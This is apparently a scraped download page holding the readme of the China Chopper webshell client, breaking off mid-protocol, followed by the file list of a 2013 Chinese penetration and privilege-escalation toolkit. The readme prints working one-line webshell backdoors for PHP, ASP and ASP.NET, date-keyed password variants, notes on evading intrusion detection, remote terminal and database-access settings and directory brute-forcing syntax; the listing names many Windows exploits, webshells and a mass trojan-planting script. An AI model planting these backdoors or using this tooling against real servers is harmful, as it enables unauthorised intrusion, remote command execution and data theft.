软件名称:中国菜刀(China chopper)
官方网站:http://www.maicaidao.com/
----------------------------------------------------------------------------------------------------------
免责申明:
请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果本厂家不承担任何责任!
----------------------------------------------------------------------------------------------------------
程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
----------------------------------------------------------------------------------------------------------
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分
1)基本信息
Eval服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP, ASP, ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下:
PHP: <?php @eval($_POST['chopper']);?>
ASP: <%eval request("chopper")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
(注意: ASP.NET要单独一个文件或此文件也是Jscript脚本)
Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
此模式可按需定制,比如只要浏览目录,或是只要虚拟终端功能,代码可以很简短。
随日期变化的连接密码, 服务端写法:
Asp.NET:
<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>
PHP:
@eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]);
例如:菜刀的密码为chopper,在前面加三个字符,新密码为:{D}chopper
2)几大功能
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,
保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2. 虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。
3. 数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式连接的数据库。
如果精通SQL语法,何必还要PHPMYADMIN呢?而且,菜刀还支持任何脚本的数据库管理呢。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
4. 自写脚本:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。
可以在官网下载别人的CCC脚本,或分享你的得意之作。
注意:由于服务器的安全设置,某些功能可能不能正常使用。
3) 配置信息填写说明
---------------------------------------------------------------------------------------
A) 数据库方面:
-----------------------------------------------------------------------------
PHP脚本:
<T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
<H>主机地址<H> 主机地址可为机器名或IP地址,如localhost
<U>数据库用户</U> 连接数据库的用户名,如root
<P>数据库密码</P> 连接数据库的密码,如123455
<L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1
ASP和ASP.NET脚本:
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件
Customize 脚本:
<T>类型</T> 类型只能填XDB
<X>与Customize 脚本约定的配置信息</X>
菜刀自带的Customize.jsp数据库参数填写方法如下(两行):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
</X>
MYSQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/password@127.0.0.1:1521/test
</X>
B) 其它方面:
-----------------------------------------------------------------------------
添加额外附加提交的数据,如ASP的新服务端是这样的:
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SC"))
o.run "ff",Server,Response,Request,Application,Session,Error
%>
那么,菜刀在配置处填入:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>
默认终端程序路径设置示例:
<SHELL>/bin/sh</SHELL>
虚拟终端默认命令设置示例:
<CMD>whoami</CMD>
文件管理默认打开的目录设置示例:
<CD>c:\windows\temp\</CD>
3) HTTP登录验证
SHELL地址这样填 http://user:pass@maicaidao.com/server.asp
用户名密码中的特殊字符可用URL编码转换。
4) 数据导入:在SHELL列表界面,右键有一项菜单,可以把其它的菜刀库导入到当前分类中。
二、安全扫描
蜘蛛爬行,绑定域名查询,目录爆破。
命令解释:
A) 查单一IP的绑定域名
{reverse_ip} {url:http://www.maicaidao.com/}
B) 扫描本C段开放的WEB服务器,并查询绑定域名
{reverse_ip_c} {url:http://www.maicaidao.com/}
C) 只扫描本C段开放的WEB服务器
{reverse_ip_c} {url:http://www.maicaidao.com/} {port}
D) 蜘蛛爬行
{spider} {url:http://www.maicaidao.com/}
E) 蜘蛛爬行,并设定爬行范围
{spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
F) 蜘蛛爬行,过滤重复URL加快速度
加上 {filter}
G) 爆破功能,%s为dict中的一行
flag:后面为返回的数据(含HTTP头部)中的特定关键字
加!!为不包含关键字为TRUE,否则包含关键字为TRUE
list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件
{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
{crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {dict:list.txt}
三、定时提醒
当闹钟来用吧, 周期:每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是加密存储的。
五、浏览器
就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
如果有ip.dat库,在状态栏会显示此网站的IP,国家代码。
六、其它部分
等待加入。
--------------------------------------------
20110628版更新注意事项
缓存库最好重建一下。
--------------------------------------------
文件说明:
------------------------------------------------------------------
chopper.exe 菜刀程序
db.mdb 菜刀的主数据库
------------------------------------------------------------------
cache.tmp 菜刀的缓存数据库(可删除)
readme.txt 你现在正在看的(可删除)
<CCC> 菜刀的自写脚本(可删除)
<Customize> Customize模式的服务端(可删除)
Customize.aspx 这是一个C#的示例服务端(全功能)
Customize.jsp 这是一个jsp的示例服务端(全功能)
Customize.cfm 这是一个cfm的示例服务端(文件管理,虚拟终端)
----附---------------------------Customize模式菜刀和服务端通信接口-----------------------------------------------------------------
----------------------------------其它语言的服务端代码可按此接口来编写(请参照Customize.jsp/Customize.cfm)---------------------
例:菜刀客户端填写的密码为pass,网页编码选的是GB2312(Jsp服务端会用到此参数)
注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记
注:返回的错误信息开头包含ERROR://
注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车
注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
-----------------------------------------------------------------------------------------------------------------------------------
[得到当前目录的绝对路径]
提交:pass=A&z0=GB2312
返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表
示例:c:\inetpub\wwwroot\ C:D:E:K:
示例:/var/www/ht
没有合适的资源?快使用搜索试试~ 我知道了~
Seay 2013渗透提权工具包V2.0.rar
共486个文件
txt:66个
exe:65个
7z:55个
需积分: 10 11 下载量 108 浏览量
2018-03-06
10:05:11
上传
评论
收藏 78.36MB RAR 举报
温馨提示
Seay 2013渗透提权工具包V2.0.rar Seay 2013渗透提权工具包V2.0.rar
资源推荐
资源详情
资源评论
收起资源包目录
Seay 2013渗透提权工具包V2.0.rar (486个子文件)
Office 全版溢出系列捆绑工具.7z 2.18MB
ms06001.7z 1.42MB
MicrosoftJet(msjet40.dll)支持反向连接漏洞利用程序.7z 1.06MB
RPC Exploit GUI by r3L4x v2.7z 745KB
ms04019.7z 734KB
IIS6和ASP的本地溢出.7z 567KB
Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit.7z 521KB
Windows ASN.1 远程溢出.7z 485KB
msdds.dll远程代码执行漏洞.7z 321KB
MSSQLHelloBuffe.7z 195KB
Ms04011SS..7z 161KB
Windows SSL Library远程溢出.7z 108KB
42端口溢出.7z 106KB
MS05-039漏洞溢出三合一工具包.7z 92KB
MS05039_exp.7z 76KB
Wins MS04045 改进版.7z 71KB
Windows RSH daemon 1.7远程栈溢出漏洞分析与利用.7z 59KB
MS05051扫描与溢出.7z 52KB
Microsoft Windows键盘事件权限提升漏洞.7z 49KB
Windows COM结构存储本地溢出漏洞(MS05012).7z 37KB
Windows键盘本地溢出.7z 36KB
MS05-055攻击工具.7z 35KB
MS05017漏洞.7z 35KB
(MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow .7z 33KB
Microsoft Windows SMB驱动本地权限提升漏洞(MS06-030).7z 31KB
MS05016_exp.7z 28KB
ms07065_exp.7z 28KB
ms07065.7z 28KB
MS05018—CSRSS.EXE漏洞利用.7z 27KB
ms05018_exp.7z 27KB
ms04045.7z 25KB
winmsmq0.3.7z 24KB
MS05-039 Microsoft Windows Plug-and-Play Service Remote Overflow.7z 24KB
MS06-007拒绝服务漏洞工具(IGMPV3 DOS).7z 23KB
MS06007_exp.7z 23KB
MS06-040溢出套装.7z 22KB
ANI光标漏洞利用程序.7z 21KB
DNS溢出.7z 21KB
ms08-011.7z 20KB
MS07-004_exp.7z 19KB
Windows Local Privilege Escalation Vulnerability Exploit(secdrv) for winxp & win2k3.7z 18KB
hhctrlexp.7z 18KB
MicrosoftOfficeWPSExploit(MS08-011)mika修改加强版.7z 18KB
MS04-020.7z 17KB
wmf远程执行漏洞(MS06-001).7z 17KB
ms06040rpc(修改版).7z 17KB
ms04011.7z 16KB
MS Windows GDI Local Privilege Escalation Exploit (MS07-017).7z 15KB
ms0601.7z 8KB
Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability.7z 7KB
MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017).7z 4KB
MS07-017 windows 2000 and windows xp sp2 真正修改能用版本.7z 3KB
Windows 内核漏洞 ms08025 分析.7z 3KB
MicrosoftOutlookExpressNNTP响应解析溢出漏洞.7z 2KB
[MSA01110707] Flash Player Plugin Video file parsing Remote Code Execution POC.7z 2KB
ankder.ans 42B
kdminy.asp 99KB
config1.asp 99KB
ASPda.asp 97KB
su.asp 7KB
diy.asp 2KB
conn1.asp 28B
ASPXmax.aspx 71KB
seay.aspx 71KB
Customize.aspx 5KB
Seay命令执行小马.aspx 4KB
aspx小马.aspx 2KB
Aspx.aspx 2KB
aspxxiao.aspx 2KB
cmd.bat 460KB
解决ActiveX部件不能创建对象.bat 2KB
fg.bat 506B
user.bat 156B
w.bat 122B
ti.bat 28B
host.bin 36KB
phpSpy.ccc 149KB
phpspy2011.ccc 148KB
asp目录写权限检测.ccc 20KB
aspSpy.ccc 6KB
iisspyencode.ccc 4KB
cmd_过一流监控.ccc 3KB
php_HTTP代理.ccc 3KB
Aspx文件搜索.ccc 2KB
php端口转向.ccc 2KB
PHP批量挂马.ccc 2KB
ASP读终端端口.ccc 2KB
Aspx设置权限.ccc 1KB
aspRwWithJMail.ccc 668B
aspx.ccc 564B
Asp执行命令.ccc 496B
扫描端口_php.ccc 428B
php.ccc 262B
Customize.cfm 3KB
common.cgi 20KB
nt.cgi 16KB
unix.cgi 6KB
Help.chm 847KB
MD5Crack.chm 47KB
report.dat 3KB
共 486 条
- 1
- 2
- 3
- 4
- 5
资源评论
PoPAO0
- 粉丝: 1
- 资源: 6
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功